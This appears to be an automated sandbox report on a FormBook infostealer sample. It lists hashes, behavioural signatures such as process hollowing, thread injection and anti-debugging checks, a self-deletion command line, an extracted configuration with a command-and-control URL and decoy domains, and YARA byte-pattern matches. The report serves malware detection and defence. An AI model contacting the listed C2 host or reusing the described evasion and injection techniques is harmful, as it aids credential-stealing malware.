Play interactive tour

Edit tour

Windows Analysis Report TT COPY_02101011.exe

Overview

General Information

Sample Name:	TT COPY_02101011.exe
Analysis ID:	528714
MD5:	ebabc0d66a9e01cc0926f3b311feff5f
SHA1:	83a44664135a7255045becde754dae29be496c8f
SHA256:	ea8733d0ea6248e2f522487d09e7854230a648e67f1a5e90fea31f6305a1ff7b
Tags:	exeFormbookxloader
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for dropped file

Sample uses process hollowing technique

Uses netstat to query active network connections and open ports

Maps a DLL or memory area into another process

Performs DNS queries to domains with low reputation

Self deletion via cmd delete

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

TT COPY_02101011.exe (PID: 6584 cmdline: "C:\Users\user\Desktop\TT COPY_02101011.exe" MD5: EBABC0D66A9E01CC0926F3B311FEFF5F)

TT COPY_02101011.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\TT COPY_02101011.exe" MD5: EBABC0D66A9E01CC0926F3B311FEFF5F)

explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

autoconv.exe (PID: 6712 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)

NETSTAT.EXE (PID: 744 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)

cmd.exe (PID: 7080 cmdline: /c del "C:\Users\user\Desktop\TT COPY_02101011.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.helpfromjames.com/e8ia/"], "decoy": ["le-hameau-enchanteur.com", "quantumsystem-au.club", "engravedeeply.com", "yesrecompensas.lat", "cavallitowerofficials.com", "800seaspray.com", "skifun-jetski.com", "thouartafoot.com", "nft2dollar.com", "petrestore.online", "cjcutthecord2.com", "tippimccullough.com", "gadget198.xyz", "djmiriam.com", "bitbasepay.com", "cukierniawz.com", "mcclureic.xyz", "inthekitchenshakinandbakin.com", "busy-clicks.com", "melaniemorris.online", "elysiangp.com", "7bkj.com", "wakeanddraw.com", "ascalar.com", "iteraxon.com", "henleygirlscricket.com", "torresflooringdecorllc.com", "helgquieta.quest", "xesteem.com", "graffity-aws.com", "bolerparts.com", "andriylysenko.com", "bestinvest-4-you.com", "frelsicycling.com", "airductcleaningindianapolis.net", "nlproperties.net", "alkoora.xyz", "sakiyaman.com", "wwwsmyrnaschooldistrict.com", "unitedsafetyassociation.com", "fiveallianceapparel.com", "edgelordkids.com", "herhauling.com", "intelldat.com", "weprepareamerica-planet.com", "webartsolution.net", "yiquge.com", "marraasociados.com", "dentalimplantnearyou-ca.space", "linemanbible.com", "dunamisdispatchservicellc.com", "latamoperationalinstitute.com", "stpaulsschoolbagidora.com", "groupninemed.com", "solar-tribe.com", "footairdz.com", "blttsperma.quest", "xfeuio.xyz", "sahodyafbdchapter.com", "0934800.com", "dandftrading.com", "gladway.net", "mineriasinmercurio.com", "inaampm.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ae9:$sqlite3step: 68 34 1C 7B E1 0x6bfc:$sqlite3step: 68 34 1C 7B E1 0x6b18:$sqlite3text: 68 38 2A 90 C5 0x6c3d:$sqlite3text: 68 38 2A 90 C5 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ae9:$sqlite3step: 68 34 1C 7B E1 0x6bfc:$sqlite3step: 68 34 1C 7B E1 0x6b18:$sqlite3text: 68 38 2A 90 C5 0x6c3d:$sqlite3text: 68 38 2A 90 C5 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.1.TT COPY_02101011.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.1.TT COPY_02101011.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.TT COPY_02101011.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
1.0.TT COPY_02101011.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.0.TT COPY_02101011.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.TT COPY_02101011.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
0.2.TT COPY_02101011.exe.2a30000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.TT COPY_02101011.exe.2a30000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.TT COPY_02101011.exe.2a30000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
1.2.TT COPY_02101011.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.TT COPY_02101011.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.TT COPY_02101011.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
1.0.TT COPY_02101011.exe.400000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
